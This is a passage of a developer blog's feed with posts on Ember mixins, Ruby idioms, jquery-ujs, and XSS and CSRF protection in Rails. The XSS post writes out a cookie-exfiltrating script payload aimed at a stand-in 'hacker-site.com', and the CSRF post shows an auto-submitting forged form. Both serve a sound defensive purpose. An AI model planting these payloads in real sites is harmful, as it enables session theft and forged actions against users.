      <content type="html"><![CDATA[<p>emberjs has mixin feature which allows code reuse and keep code modular. It alsosupport <code>_super()</code> method.</p><h2>mixin using apply</h2><pre><code class="language-javascript">m = Ember.Mixin.create({  skill: function () {    return &quot;JavaScript &amp; &quot; + this._super();  },});main = {  skill: function () {    return &quot;Ruby&quot;;  },};o = m.apply(main);console.log(o.skill());result: JavaScript &amp; Ruby;</code></pre><h2>mixin in create and extend</h2><p>Now lets see usage of mixin in <code>create</code> and <code>extend</code>. Since <code>create</code> and<code>extend</code> work similarly I am only going to discuss <code>create</code> scenario .</p><pre><code class="language-javascript">skillJavascript = Ember.Mixin.create({  skill: function () {    return &quot;JavaScript &quot;;  },});main = {  skill: function () {    return &quot;Ruby &amp; &quot; + this._super();  },};p = Ember.Object.create(skillJavascript, main);console.log(p.skill());result: Ruby &amp; JavaScript;</code></pre><p>Notice that in the first case the mixin code was executed first. In the secondcase the mixin code was execute later.</p><h2>Here is how it works</h2><p><a href="https://github.com/emberjs/ember.js/blob/master/packages/ember-metal/lib/mixin.js#L65">Here is mergeMixins code</a>which accepts the mixins and the base class. In the first case the mixins listis just the mixin and the base class is the main class.</p><p>At run time all the mixin properties are looped through. In the first case themixin <code>m</code> has a property called <code>skill</code> .</p><pre><code class="language-javascript">m.mixins[0].properties.skillfunction () {    return 'JavaScript &amp; ' + this._super()  }</code></pre><p>Runtime detects that both mixin and the base class has a property called <code>skill</code>. Since base class has the first claim to the property a call is made to linkthe <code>_super</code> of the second function to the first function.</p><p>That works is done by<a href="https://github.com/emberjs/ember.js/blob/master/packages/ember-metal/lib/utils.js#L287-316">wrap</a>function.</p><p>So at the end of the execution the mixin code points to base code as <code>_super</code>.</p><h2>It reveres itself in case of create</h2><p>In the second case the mixin <code>skillJavaScript</code> and the <code>main</code> are the mixins tobase class of <code>Class</code>. The mixin is the first in the looping order. So the mixinhas the first claim to key <code>skill</code> since it was unclaimed by base class to beginwith.</p><p>Next comes the main function and since the key is already taken the wrapfunction is used to map <code>_super</code> of main to point to the mixin .</p><h2>Remember in Create and Extend it is the last one that executes first</h2><p>Here is an example with two mixins.</p><pre><code class="language-javascript">skillHaskell = Ember.Mixin.create({  skill: function () {    return &quot;Haskell&quot;;  },});skillJavascript = Ember.Mixin.create({  skill: function () {    return &quot;JavaScript &amp; &quot; + this._super();  },});p = Ember.Object.create(skillHaskell, skillJavascript, {  skill: function () {    return &quot;Ruby &amp; &quot; + this._super();  },});console.log(p.skill());result: Ruby &amp; JavaScript &amp; Haskell;</code></pre><p>In this case the haskell mixin first claimed the key. So the javascript mixin's<code>_super</code> points to haskell and the main code's <code>_super</code> points to Javascript.</p><h2>Embjers makes good use of mixin</h2><p>emberjs has features like <code>comparable</code>, <code>freezable</code>, <code>enumerable</code>, <code>sortable</code>,<code>observable</code>. Take a look at this (Link is not available) to checkout theircode.</p>]]></content>
    </entry><entry>
       <title><![CDATA[extend self in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/extend-self-in-ruby"/>
      <updated>2012-06-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/extend-self-in-ruby</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with ruby 1.9.3 .</em></p><h2>Class is meant for both data and behavior</h2><p>Lets look at this ruby code.</p><pre><code class="language-ruby">class Util  def self.double(i)   i*2  endendUtil.double(4) #=&gt; 8</code></pre><p>Here we have a <code>Util</code> class. But notice that all the methods on this class areclass methods. This class does not have any instance variables. Usually a classis used to carry both data and behavior and ,in this case, the Util class hasonly behavior and no data.</p><h2>Similar utility tools in ruby</h2><p>Now to get some perspective on this discussion lets look at some ruby methodsthat do similar thing. Here are a few.</p><pre><code class="language-ruby">require 'base64'Base64.encode64('hello world') #=&gt; &quot;aGVsbG8gd29ybGQ=\n&quot;require 'benchmark'Benchmark.measure { 10*2000 }require 'fileutils'FileUtils.chmod 0644, 'test.rb'Math.sqrt(4) #=&gt; 2</code></pre><p>In all the above cases the class method is invoked without creating an instancefirst. So this is similar to the way I used <code>Util.double</code> .</p><p>However lets see what is the class of all these objects.</p><pre><code class="language-ruby">Base64.class #=&gt; ModuleBenchmark.class #=&gt; ModuleFileUtils.class #=&gt; ModuleMath.class #=&gt; Module</code></pre><p>So these are not classes but modules. That begs the question why the smart guysat ruby-core implemented them as modules instead of creating a class the way Idid for Util.</p><p>Reason is that Class is too heavy for creating only methods like <code>double</code>. As wediscussed earlier a class is supposed to have both data and behavior. If theonly thing you care about is behavior then ruby suggests to implement it as amodule.</p><h2>extend self is the answer</h2><p>Before I go on to discuss <code>extend self</code> here is how my <code>Util</code> class will lookafter moving from <code>Class</code> to <code>Module</code>.</p><pre><code class="language-ruby">module Util  extend self  def double(i)    i * 2  endendputs Util.double(4) #=&gt; 8</code></pre><h3>So how does extend self work</h3><p>First lets see what extend does.</p><pre><code class="language-ruby">module M def double(i)  i * 2 endendclass Calculator  extend Mendputs Calculator.double(4)</code></pre><p>In the above case <code>Calculator</code> is extending module <code>M</code> and hence all theinstance methods of module <code>M</code> are directly available to <code>Calculator</code>.</p><p>In this case <code>Calculator</code> is a class that extended the module <code>M</code>. However<code>Calculator</code> does not have to be a class to extend a module.</p><p>Now lets try a variation where <code>Calculator</code> is a module.</p><pre><code class="language-ruby">module M def double(i)  i * 2 endendmodule Calculator  extend Mendputs Calculator.double(4) #=&gt; 8</code></pre><p>Here Calculator is a module that is extending another module.</p><p>Now that we understand that a module can extend another module look at the abovecode and question why module <code>M</code> is even needed. Why can't we move the method<code>double</code> to module Calculator directly. Let's try that.</p><pre><code class="language-ruby">module Calculator  extend Calculator   def double(i)    i * 2   endendputs Calculator.double(4) #=&gt; 8</code></pre><p>I got rid of module <code>M</code> and moved the method <code>double</code> inside module<code>Calculator</code>. Since module <code>M</code> is gone I changed from <code>extend M</code> to<code>extend Calculator</code>.</p><p>One last fix.</p><p>Inside the module Calculator what is <code>self</code>. <code>self</code> is the module <code>Calculator</code>itself. So there is no need to repeat <code>Calculator</code> twice. Here is the finalversion</p><pre><code class="language-ruby">module Calculator  extend self   def double(i)    i * 2   endendputs Calculator.double(4) #=&gt; 8</code></pre><h2>Converting A Class into a Module</h2><p>Every time I would encounter code like <code>extend self</code> my brain will pause for amoment. Then I would google for it. Will read about it. Three months later Iwill repeat the whole process.</p><p>The best way to learn it is to use it. So I started looking for a case to use<code>extend self</code>. It is not a good practice to go hunting for code to apply an ideayou have in your mind but here I was trying to learn.</p><p>Here is a before snapshot of methods from <code>Util</code> class I used in a project.</p><pre><code class="language-ruby">class Util  def self.config2hash(file); end  def self.in_cents(amount); end  def self.localhost2public_url(url, protocol); endend</code></pre><p>After using <code>extend self</code> code became</p><pre><code class="language-ruby">module Util  extend self  def config2hash(file); end  def in_cents(amount); end  def localhost2public_url(url, protocol); endend</code></pre><p>Much better. It makes the intent clear and ,I believe, it is in line with theway ruby would expect us to use.</p><h2>Another usage inline with how Rails uses extend self</h2><p>Here I am building an ecommerce application and each new order needs to get anew order number from a third party sales application. The code might look likethis. I have omitted the implementation of the methods because they are notrelevant to this discussion.</p><pre><code class="language-ruby">class Order  def amount; end  def buyer; end  def shipped_at; end  def number    @number || self.class.next_order_number  end  def self.next_order_number; 'A100'; endendputs Order.new.number #=&gt; A100</code></pre><p>Here the method <code>next_order_number</code> might be making a complicated call toanother sales system. Ideally the class <code>Order</code> should not expose method<code>next_order_number</code> . So we can make this method <code>private</code> but that does notsolve the root problem. The problem is that model <code>Order</code> should not know howthe new order number is generated. Well we can move the method<code>next_order_number</code> to another <code>Util</code> class but that would create too muchdistance.</p><p>Here is a solution using <code>extend self</code>.</p><pre><code class="language-ruby">module Checkout  extend self  def next_order_number; 'A100'; end  class Order    def amount; end    def buyer; end    def shipped_at; end    def number      @number || Checkout.next_order_number    end  endendputs Checkout::Order.new.number #=&gt; A100</code></pre><p>Much better. The class Order is not exposing method <code>next_order_number</code> and thismethod is right there in the same file. No need to open the <code>Util</code> class.</p><p>To see practical examples of <code>extend self</code> please look at Rails source code andsearch for <code>extend self</code>. You will find some interesting usage.</p><p>This is my first serious attempt to learn usage of <code>extend self</code> so that nexttime when I come across such code my brain does not freeze. If you think I havemissed out something then do let me know.</p>]]></content>
    </entry><entry>
       <title><![CDATA[to_str in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/to_str-in-ruby"/>
      <updated>2012-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/to_str-in-ruby</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with ruby 1.9.3 .</em></p><h2>All objects have to_s method</h2><p><code>to_s</code> method is define in <code>Object</code> class and hence all ruby objects have method<code>to_s</code>.</p><p>Certain methods always call <code>to_s</code> method. For example when we do stringinterpolation then <code>to_s</code> method is called. <code>puts</code> invokes <code>to_s</code> method too.</p><pre><code class="language-ruby">class Lab def to_s  'to_s' end def to_str  'to_str' endendl = Lab.newputs &quot;#{l}&quot; #=&gt; to_sputs l #=&gt; to_s</code></pre><p><code>to_s</code> is simply the string representation of the object.</p><p>Before we look at <code>to_str</code> let's see a case where ruby raises error.</p><pre><code class="language-ruby">e = Exception.new('not sufficient fund')# case 1puts e# case 2puts &quot;notice: #{e}&quot;# case 3puts &quot;Notice: &quot; + e</code></pre><p>Here is the result</p><pre><code class="language-text">not sufficient fundNotice: not sufficient fund`+': can't convert Exception into String (TypeError)</code></pre><p>In the first two cases the <code>to_s</code> method of object <code>e</code> was printed.</p><p>However in case '3' ruby raised an error.</p><p>Let's read the error message again.</p><pre><code class="language-text">`+': can't convert Exception into String (TypeError)</code></pre><p>In this case on the left hand side we have a string object. To this stringobject we are trying to add object <code>e</code>. Ruby could have called <code>to_s</code> method on<code>e</code> and could have produced the result. But ruby refused to do so.</p><p>Ruby refused to do so because it found that the object we are trying to add tostring is not of type String. When we call <code>to_s</code> we get the stringrepresentation of the string. But the object might or might not be behaving likea string.</p><p>Here we are not looking for the string representation of <code>e</code>. What we want isfor <code>e</code> to behave a like string. And that is where <code>to_str</code> comes in picture. Ihave a few more examples to clear this thing so hang in there.</p><h2>What is to_str</h2><p>If an object implements <code>to_str</code> method then it is telling the world that myclass might not be <code>String</code> but for all practical purposes treat me like astring.</p><p>So if we want to make exception object behave like a string then we can add<code>to_str</code> method to it like this.</p><pre><code class="language-ruby">e = Exception.new('not sufficient fund')def e.to_str  to_sendputs &quot;Notice: &quot; + e #=&gt; Notice: not sufficient fund</code></pre><p>Now when we run the code we do not get any exception.</p><h2>What would happen if Fixnum has to_str method</h2><p>Here is an example where ruby raises exception.</p><pre><code class="language-ruby">i = 10puts '7' + i #=&gt; can't convert Fixnum into String (TypeError)</code></pre><p>Here Ruby is saying that Fixnum is not like a string and it should not be addedto String.</p><p>We can make Fixnum to behave like a string by adding a <code>to_str</code> method.</p><pre><code class="language-ruby">class Fixnum  def to_str    to_s  endendi = 10puts '7' + i #=&gt; 710</code></pre><p>The practical usage of this example can be seen here.</p><pre><code class="language-text">irb(main):002:0&gt; [&quot;hello&quot;, &quot;world&quot;].join(1)TypeError: no implicit conversion of Fixnum into String</code></pre><p>In the above case ruby is refusing to invoke <code>to_s</code> on &quot;1&quot; because it knows thatadding &quot;1&quot; to a string does not feel right.</p><p>However we can add method <code>to_str</code> to Fixnum as shown in the last section andthen we will not get any error. In this case the result will be as shown below.</p><pre><code class="language-text">irb(main):008:0&gt; [&quot;hello&quot;, &quot;world&quot;].join(1)=&gt; &quot;hello1world&quot;</code></pre><h2>A real practical example of defining to_str</h2><p>I <a href="https://twitter.com/neerajsingh0101/status/217128187489042432">tweeted</a> about<a href="https://github.com/rails/rails/commit/188cc90af9b29d5520564af7bd7bbcdc647953ca">a quick lesson in to_s vs to_str</a>and a few people asked me to expand on that. Lets see what is happening here.</p><p>Before the refactoring was done <code>Path</code> is a subclass of <code>String</code>. So it isString and it has all the methods of a string.</p><p>As part of refactoring <code>Path</code> is no longer extending from <code>String</code>. However forall practical purposes it acts like a string. This line is important and I amgoing to repeat it. For all practical purposes <code>Path</code> here is like a <code>String</code>.</p><p>Here we are not talking about the string representation of <code>Path</code>. Here <code>Path</code>is so close to <code>String</code> that practically it can be replaced for a string.</p><p>So in order to be like a <code>String</code> class <code>Path</code> should have <code>to_str</code> method andthat's exactly what was done as part of refactoring.</p><p>During discussion with my friends someone suggested instead of defining <code>to_str</code>tenderlove could have just defined <code>to_s</code> and the result would have been same.</p><p>Yes the result would be same whether you have defined <code>to_s</code> or <code>to_str</code> if youdoing <code>puts</code>.</p><pre><code class="language-ruby">puts Path.new('world')</code></pre><p>However in the following case just defining <code>to_s</code> will cause error. Only byhaving <code>to_str</code> following case will work.</p><pre><code class="language-ruby">puts 'hello ' + Path.new('world')</code></pre><p>So the difference between defining <code>to_s</code> and <code>to_str</code> is not just what you seein the output.</p><h2>Conclusion</h2><p>If a class defines <code>to_str</code> then that class is telling the world that althoughmy class is not <code>String</code> you can treat me like a <code>String</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jquery-ujs and jquery trigger]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-ujs-and-jquery-trigger"/>
      <updated>2012-05-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-ujs-and-jquery-trigger</id>
      <content type="html"><![CDATA[<p>Let's see how to make AJAX call using jquery.</p><p>jQuery's ajax method's <code>success</code> callback function takes three parameters. Hereis the <a href="http://api.jquery.com/jQuery.ajax/">api</a> .</p><pre><code class="language-javascript">success(data, textStatus, jqXHR);</code></pre><p>So if you are making ajax call using jQuery the code might look like</p><pre><code class="language-javascript">$.ajax({  url: &quot;ajax/test.html&quot;,  success: function (data, textStatus, jqXHR) {    console.log(data);  },});</code></pre><h2>ajax using jquery-ujs</h2><p>If you are using Rails and jquery-ujs then you might have code like this</p><pre><code class="language-plaintext">&lt;a href=&quot;/users/1&quot; data-remote=&quot;true&quot; data-type=&quot;json&quot;&gt;Show&lt;/a&gt;</code></pre><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;ajax:success&quot;, function (data, status, xhr) {  alert(data.name);});</code></pre><p>Above code will not work. In order to make it work the very first element passedto the callback must be an event object. Here is the code that will work.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;ajax:success&quot;, function (event, data, status, xhr) {  alert(data.name);});</code></pre><p>Remember that jQuery api says that the first parameter should be &quot;data&quot; then whywe need to pass event object to make it work.</p><h2>Why event object is needed</h2><p>Here is snippet from jquery-ujs code</p><pre><code class="language-plaintext">success: function(data, status, xhr) {  element.trigger('ajax:success', [data, status, xhr]);}</code></pre><p>The thing about <a href="http://api.jquery.com/trigger/">trigger</a> method is that theevent object is always passed as the first parameter to the event handler. Thisis why when you are using jquery-ujs you have to have the first parameter in thecallback function an event object.</p>]]></content>
    </entry><entry>
       <title><![CDATA[XSS and Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/xss-and-rails"/>
      <updated>2012-05-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/xss-and-rails</id>
      <content type="html"><![CDATA[<p>XSS is<a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">consistently a top</a>web application security risk as per<a href="https://www.owasp.org/index.php/Main_Page">The Open Web Application Security Project (OWASP)</a>.</p><p>XSS vulnerability allows hacker to <strong>execute JavaScript code</strong> that hacker hasput in.</p><p>Most web applications has a form. User enters<code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code> in address field and hits submit. Ifuser sees a JavaScript alert then it means user can execute the JavaScript codethat user has put in. It means site has XSS vulnerability.</p><p>Almost all modern web applications have some JavaScript code. And theapplication executes JavaScript code. So running JavaScript code is not anissue. The issue is that in this case hacker is able to put in JavaScript codeand then hacker is able to run that code. No one should be allowed to put theirJavaScript code into the application.</p><p>If a hacker can execute JavaScript code then the hacker can see some otherpersons' cookie. Later we will see how hacker can do that.</p><p>If you are logged into an application then that application sets a cookie. Thatis how the application knows that you are logged in.</p><p>If a hacker can see someone else's cookie then the hacker can log in as thatperson by stealing cookie.</p><p>Having SSL does not protect site from XSS vulnerability.</p><p>XSS stands for <em>Cross-site scripting</em>. It is a very misleading name because XSShas absolutely nothing to do with <em>cross-site</em>. It has everything to do with asite, any site.</p><h2>A practical example</h2><p>It is very common to display address in a formatted way. Usually the code issomething like this.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]array.compact.join('&lt;br /&gt;')</code></pre><p>When developer looks at the html page developer will see something like this.</p><p><img src="/blog_images/2012/xss-and-rails/xss1.png" alt="xss"></p><p><code>&lt;br /&gt;</code> tag is literally shown on the screen. Developer looks at the htmlmarkup rendered by Rails and it looks like this</p><p><img src="/blog_images/2012/xss-and-rails/xss2.png" alt="xss"></p><p>So the developer comes back to code and marks the string <code>html_safe</code> as shownbelow.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]array.compact.join('&lt;br /&gt;').html_safe</code></pre><p>Now the browser renders the address with proper <code>&lt;br /&gt;</code> tag and the addresslooks nicely formatted as shown below.</p><p><img src="/blog_images/2012/xss-and-rails/xss3.png" alt="xss"></p><p>The developer is happy and the developer moves on.</p><p>However notice that developer has marked user input data like <code>address1</code> as<code>html_safe</code> and that's dangerous.</p><h2>Hacker in action</h2><p>The application has a number of users and everything is running smoothly. Allthe users are seeing properly formatted address. And then one day a hacker triedto hack the site. The hacker puts in address1 as<code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code>.</p><p>Now the hacker will see a JavaScript alert which might look like this.</p><p><img src="/blog_images/2012/xss-and-rails/xss4.png" alt="xss"></p><p>If we look at the html markup then the html might look like this.</p><pre><code class="language-plaintext">John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA</code></pre><p>Hacker had put in <code>&lt;script&gt;</code> and the application sent that code to browser.Browser did its job. It executed the JavaScript code and in the process hackeris able to see the cookie.</p><h2>How would hacker steal someone else's information.</h2><p>Let's say that an application has a comment form. In the comment form hackerputs in comment as following.</p><p>&lt;script&gt;window.location='http://hacker-site.com?cookie='+document.cookie&lt;/script&gt;</p><p>Next day another user, Mary, comes to the site and logs in. She is reading thesame post and that post has a lot of comments and one of the comments is commentposted by the hacker.</p><p>The application loads all the comments including the comment posted by thehacker.</p><p>When browser sees JavaScript code then browser executes it. And now Mary'scookie information has been sent to hacker-site and Mary is not even aware ofit.</p><p>This is a classic case of XSS attack and this is how hacker can next time loginas Mary just by using her cookie information.</p><h2>Fixing XSS</h2><p>Now that we know how hacker might be able to execute JavaScript code on ourapplication question is how do we prevent it.</p><p>Well there is only way to prevent it. And that is <strong>do not send <code>&lt;script&gt;</code> tagto the browser</strong>. If we send <code>&lt;script&gt;</code> tag to the browser then browser willexecute that JavaScript.</p><p>So what can we do so that <code>&lt;script&gt;</code> tag is not sent to the browser.</p><h2>Rails default behavior is to keep things secure</h2><p>Before we start looking at solutions lets revisit what happened when earlier wedid not mark content as <code>html_safe</code>. So let's remove <code>html_safe</code> and lets try tosee the content posted by the hacker.</p><p>So the code without <code>html_safe</code> would look like this.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name state_name, zip, country_name]array.compact.join('&lt;br /&gt;')</code></pre><p>And if we execute this code then hackers address would look like this.</p><pre><code class="language-plaintext">John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA</code></pre><p>Notice that in this case no JavaScript alert was seen. Hacker gets to see theaddress hacker had posted. Why is that. To answer that let's look at the htmlmarkup.</p><pre><code class="language-plaintext">John Smith&amp;lt;br /&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&amp;lt;br /&amp;gt;Suite #110&amp;lt;br /&amp;gt;Miami&amp;lt;br /&amp;gt;FL&amp;lt;br /&amp;gt;33027&amp;lt;br /&amp;gt;USA</code></pre><p>As we can see Rails did not render the address exactly as it was posted by thehacker. Rails did something because of which <code>&lt;script&gt;</code> turned into<code>&amp;lt;script&amp;gt;</code>.</p><p>Rails html escaped the content by using method<a href="https://github.com/rails/rails/blob/72ffeb9fe58c46bd556a85bed5214d8f482737a5/activesupport/lib/active_support/core_ext/string/output_safety.rb#L21">html_escape</a>.</p><p>By default Rails assumes that all content is not safe and thus Rails subjectsall content to <code>html_escape</code> method.</p><p>Problem is that here we are trying to format the content using <code>&lt;br /&gt;</code> andRails is escaping that also. We need to escape only the user content and notescape <code>&lt;br /&gt;</code>. Here is how we can do that.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]array.compact.map{ |i| ERB::Util.html_escape(i) }.join('&lt;br /&gt;').html_safe</code></pre><p>In the above case we are marking the content as <code>html_safe</code> because we subjectedthe content through <code>html_escape</code> and now we are sure that no unescaped usercontent can go through.</p><p>This will show address in the browser like this.</p><p><img src="/blog_images/2012/xss-and-rails/xss5.png" alt="xss"></p><p>Above solution worked. <code>&lt;br /&gt;</code> is not escaped and user input was properlyescaped.</p><h2>Another solution using content_tag</h2><p>In the above case we used <code>html_escape</code> and it worked. However if we need to addsay <code>&lt;strong&gt;</code> tag then adding the opening tag and then closing tag could bequite cumbersome. For such cases we can use<a href="https://github.com/rails/rails/blob/861b70e92f4a1fc0e465ffcf2ee62680519c8f6f/actionview/lib/action_view/helpers/tag_helper.rb#L103">content_tag</a></p><p>By default <code>content_tag</code> escapes the input text.</p><pre><code class="language-plaintext">array = [name, address1, address2, city_name, state_name, zip, country_name]array.compact.map{ |i| ActionController::Base.helpers.content_tag(:strong, i) }.join('').html_safe</code></pre><h2>simple_format for simple formatting</h2><p>If you want to format the text a little bit then you can use<a href="http://api.rubyonrails.org/classes/ActionView/Helpers/TextHelper.html#method-i-simple_format">simple_format</a>. If user enters a bunch of text in text area then simple_format can help makethe text look pretty without compromising security. It will strip away<code>&lt;script&gt;</code> and security sensitive tags. <code>html_escape</code> internally uses<a href="https://github.com/rails/rails/blob/master/actionview/lib/action_view/helpers/sanitize_helper.rb">sanitize</a>method. Note that <code>simple_format</code> will remove <code>script</code> tag while solutions like<code>html_escape</code> will preserve <code>script</code> tag in escaped format.</p><h2>Handling JSON data</h2><p>We use <a href="https://github.com/rails/jbuilder">jbuilder</a> and view looks like this.</p><pre><code class="language-plaintext">json.user do  json.name @user.name  json.address1 @user.address1  json.address2 @user.address2  json.city_name @user.city_name  json.state_name @user.state_name  json.zip @user.zip  json.country_name @user.country_nameend</code></pre><p>This will produce JSON structure as shown below.</p><p><img src="/blog_images/2012/xss-and-rails/xss6.png" alt="xss"></p><p>On the client side there is JavaScript code to display the content.<code>$('body').append(data.about)</code> does the job. Well when that content is added toDOM then browser will execute JavaScript code and now we are back to the sameproblem.</p><p>There are two ways we can handle this problem. We can send the data as it is inJSON format. Then it is a responsibility of client side JavaScript code toappend data in such a way that html tags like <code>script</code> are not executed.</p><p>jQuery provides <a href="http://api.jquery.com/text/">text(input)</a> method which escapesinput value. Here is an example.</p><p><img src="/blog_images/2012/xss-and-rails/text.png" alt="jquery text"></p><p>In this case the entire responsibility of escaping the content rests onJavaScript. While using the data JavaScript code constantly needs to be aware ofwhich content is user input and must be escaped and which content is not userinput.</p><p>That is why we favor the solution where JSON content is escaped to begin with.For escaping the content we can use <code>h</code> or <code>html_escape</code> helper method.</p><pre><code class="language-plaintext">json.user do  json.name h(@user.name)  json.address1 h(@user.address1)  json.address2 h(@user.address2)  json.city_name h(@user.city_name)  json.state_name h(@user.state_name)  json.zip h(@user.zip)  json.country_name h(@user.country_name)end</code></pre><p><img src="/blog_images/2012/xss-and-rails/xss7.png" alt="xss"></p><p>As you can see the user content is escaped. Now this data can be sent to clientside and we do not need to worry about <code>script</code> tag being executed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[CSRF and Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/csrf-and-rails"/>
      <updated>2012-05-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/csrf-and-rails</id>
      <content type="html"><![CDATA[<p>CSRF stands for <strong>Cross-site request forgery</strong>. It is a technique hackers use tohack into a web application.</p><p>Unlike <a href="xss-and-rails">XSS</a> CSRF does not try to steal your information to loginto the system. CSRF assumes that you are already logged in at your site andwhen you visit say comments section of some other site then an attack is done onyour site without you knowing it.</p><p>Here is how it might work.</p><ul><li>You log in at www.mysite.com .</li><li>Now you open a new tab and you are visiting www.gardening.com since you areinterested in gardening.</li><li>You are browsing the comments posted on the gardening.com forum. One of thecomments posted has url which has source like this<code>&lt;img src=&quot;http://www.mysite.com/grant_access?user_id=1&amp;project_id=123&quot; /&gt;</code></li><li>Now if you are the admin of the project &quot;123&quot; in www.mysite.com thenunknowingly you have granted admin access to user 1. And you did not even knowthat you did that.</li></ul><p>I know you are thinking that loading an image will make a <code>GET</code> request andgranting access is hidden behind <code>POST</code> request. So you are safe. Well thehacker can easily change code to make a <code>POST</code> request. In that case the codemight look like this</p><pre><code class="language-html">&lt;script&gt;  var url = &quot;http://mysite.com/grant_access?user_id=1&amp;project_id=123&quot;;  document.write(&quot;&lt;form name=hack method=post action=&quot; + url + &quot;&gt;&lt;/form&gt;&quot;);&lt;/script&gt;&lt;img src=&quot;&quot; onLoad=&quot;document.hack.submit()&quot; /&gt;</code></pre><p>Now when the image is loaded then a <code>POST</code> request is sent to the server and theapplication might grant access to this new user. Not good.</p><h2>Prevention</h2><p>In order to prevent such things from happening Rails uses <code>authenticity_token</code>.</p><p>If you look at source code of any form generated by Rails you will see that formcontains following code</p><pre><code class="language-plaintext">&lt;input name=&quot;authenticity_token&quot;       type=&quot;hidden&quot;       value=&quot;LhT7dqqRByvOhJJ56BsPb7jJ2p24hxNu6ZuJA+8l+YA=&quot; /&gt;</code></pre><p>The exact value of the authenticity_token will be different for you. When formis submitted then authentication_token is submitted and<a href="https://github.com/rails/rails/blob/6843cf6a94ae1efad0464381408a1c5f2f157376/actionpack/lib/action_controller/metal/request_forgery_protection.rb">Rails checks</a>the <code>authenticity_token</code> and only when it is verified the request is passedalong for further processing.</p><p>In a brand new rails application the <code>application_controller.rb</code> has only oneline.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  protect_from_forgeryend</code></pre><p>That line <code>protect_from_forgery</code> checks for the authentication of the incomingrequest.</p><p>Here is code that is responsible for generating <code>csrf_token</code>.</p><pre><code class="language-ruby"># Sets the token value for the current session.def form_authenticity_token  session[:_csrf_token] ||= SecureRandom.base64(32)end</code></pre><p>Since this <code>csrf_token</code> is a random value there is no way for hacker to knowwhat the &quot;csrf_token&quot; is for my session. And hacker will not be able to pass thecorrect &quot;authenticity_token&quot;.</p><p>Do keep in mind that this protection is applied only to <code>POST</code>, <code>PUT</code> and<code>DELETE</code> requests by Rails. Rails states that <code>GET</code> should not be changingdatabase in the first place so no need for check for authenticity of the token.</p><h2>Update for Rails 4</h2><p>If you generate a brand new Rails application using Rails 4 then the<code>application_controller.rb</code> would look like this</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  # Prevent CSRF attacks by raising an exception.  # For APIs, you may want to use :null_session instead.  protect_from_forgery with: :exceptionend</code></pre><p>Now the default value is to raise an exception if the token is not matched. TheAPI calls will not have the token. If the application is expecting api callsthen the strategy should be changed from <code>:exception</code> to <code>:null_session</code>.</p><p>Note that if the site is vulnerable to XSS then the hacker submits request as ifhe is logged in and in that case the CSRF attack will go through.</p>]]></content>
    </entry><entry>
       <title><![CDATA[tsort in ruby and rails initializers]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/tsort-in-ruby"/>
      <updated>2012-03-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tsort-in-ruby</id>
      <content type="html"><![CDATA[<p>You have been assigned the task of figuring out in what order following tasksshould be executed given their dependencies on other tasks.</p><pre><code class="language-plaintext">Task11 takes input from task5 and task7.Task10 takes input from task11 and task3.Task9 takes input from task8 and task11.Task8 takes input from task3 and task7.Task2 takes input from task11.</code></pre><p>If you look at these tasks and draw a graph then it might look like this.</p><p><img src="/blog_images/2012/tsort-in-ruby/directed_acyclic_graph.png" alt="directed acyclic graph"></p><h2>Directed acyclic graph</h2><p>The graph shown above is a &quot;Directed acyclic graph&quot; . In Directed acyclic graphsif you start following the arrow then you should never be able to get to thenode from where you started.</p><p>Directed acyclic graphs are great at describing problems where a task isdependent on another set of tasks.</p><p>We started off with a set of tasks that are dependent on another set of tasks.To get the solution we need to sort the tasks in such a way that first task isnot dependent on any task and the next task is only dependent on task previouslydone. So basically we need to sort the directed acyclic graph such that theprerequisites are done before getting to the next task.</p><p>Sorting of directed acyclic graph in the manner described above is called<em>topological sorting</em> .</p><h3>TSort</h3><p>Ruby provides<a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/tsort/rdoc/TSort.html">TSort</a> whichallows us to implement &quot;topological sorting&quot;.<a href="https://github.com/ruby/ruby/blob/master/lib/tsort.rb">Here is source code or tsort</a>.</p><p>Lets write code to find solution to the original problem.</p><pre><code class="language-ruby">require &quot;tsort&quot;class Project  include TSort  def initialize    @requirements = Hash.new{|h,k| h[k] = []}  end  def add_requirement(name, *requirement_dependencies)    @requirements[name] = requirement_dependencies  end  def tsort_each_node(&amp;block)    @requirements.each_key(&amp;block)  end  def tsort_each_child(name, &amp;block)    @requirements[name].each(&amp;block) if @requirements.has_key?(name)  endendp = 